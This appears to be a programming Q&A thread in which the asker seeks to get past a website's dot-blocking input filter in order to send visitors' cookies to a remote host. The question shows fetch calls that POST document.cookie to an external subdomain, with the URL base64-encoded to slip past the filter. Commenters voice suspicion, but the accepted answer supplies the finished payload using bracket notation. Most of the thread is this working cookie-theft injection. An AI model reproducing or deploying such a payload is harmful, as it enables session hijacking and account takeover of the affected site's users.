# Avoid dots in JS

Tags: javascript

I want to achieve sending document cookie to a domain without dots.

This is the action to be performed:

```
fetch('https://qoi4vi4vorwzfuui8lfc64s2zt5ltbh0.example.com', { method: 'POST', mode: 'no-cors', body:document.cookie })
```

This is what I have done for the moment:

```
fetch(atob('aHR0cHM6Ly9xb2k0dmk0dm9yd3pmdXVpOGxmYzY0czJ6dDVsdGJoMC5leGFtcGxlLmNvbQ=='), { method: 'POST', mode: 'no-cors', body:1 })
```

Given that:

aHR0cHM6Ly9xb2k0dmk0dm9yd3pmdXVpOGxmYzY0czJ6dDVsdGJoMC5leGFtcGxlLmNvbQ== is the base64 of https://qoi4vi4vorwzfuui8lfc64s2zt5ltbh0.example.com

I don't know how to deal with

`body:document.cookie`

to be something like:

`body:atob(ZG9jdW1lbnQuY29va2ll)` being ZG9jdW1lbnQuY29va2ll the base64 of document.cookie

I want to perform it this way, via fetch.

Regards!

Comment: A “domain without dots”?

Comment: [Why? Sound like an x/y problem...](https://meta.stackexchange.com/questions/66377/what-is-the-xy-problem) You're not gonna remove all the dots from your JS code, how do you expect to add a `.then()` to the `fetch`??

Comment: Yes, it is working right now, the domain without the dots. But not the body

Comment: What exactly is the motivation behind wanting to do that?

Comment: I’m struggling to understand what you think you’re accomplishing here. If you want to obfuscate your code use an obfuscator.

Comment: The motivation of this is because I have a website that doesn't allow me introducing dots, so I managed to perform the request via fetch(atob('base64(url)'), it is a challenge, to bypass this website restriction

Comment: "because I have a website that doesn't allow me introducing dots" hold on. You can't just write something like that without elaborating

Comment: `document['cookie']` doesn't have any dots? (this is [bracket notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Property_Accessors))

Comment: @evolutionxbox it does if you get reallllly close to the screen

Comment: @0stone0 we could do this `fetch()['then'](console['log'])`?

Answer (score 1, accepted):

Please read *all* the comments regarding our concerns about this.

---

To answer your question, use the [bracket notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Property_Accessors) (`[]`):

```
fetch(atob('aHR0cHM6Ly9xb2k0dmk0dm9yd3pmdXVpOGxmYzY0czJ6dDVsdGJoMC5leGFtcGxlLmNvbQ=='), { 
    method: 'POST', 
    mode: 'no-cors', 
    body: document['cookie']
})
```